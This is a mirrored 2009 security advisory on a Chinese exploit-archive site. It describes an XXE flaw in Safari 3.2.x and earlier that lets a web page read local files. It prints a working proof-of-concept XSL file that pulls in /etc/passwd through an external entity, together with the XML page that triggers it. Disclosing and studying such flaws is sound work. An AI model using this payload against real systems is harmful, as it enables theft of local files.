首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple Safari <= 3.2.x (XXE attack) Local File Theft Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-06-10  
Safari prior to version 4 may permit an evil web page to steal files
from the local system.

This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>

Full technical details: http://scary.beasts.org/security/CESA-2009-006.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)

Cheers
Chris

# [2009-06-09]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Shop Script Pro 2.12 Remote SQ
·Joomla Component BookLibrary 1
·Joomla Component com_portafoli
·linux/x86 generate portbind pa
·Automated Link Exchange Portal
·windows xp/sp1 generate portbi
·DM FileManager 3.9.2 Insecure
·Joomla Component Akobook 2.3 (
·Grestul 1.2 Remote Add Adminis
·Joomla Component com_media_lib
·Virtue News (SQL/XSS) Multiple
·S-CMS <= 2.0b3 Multiple Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved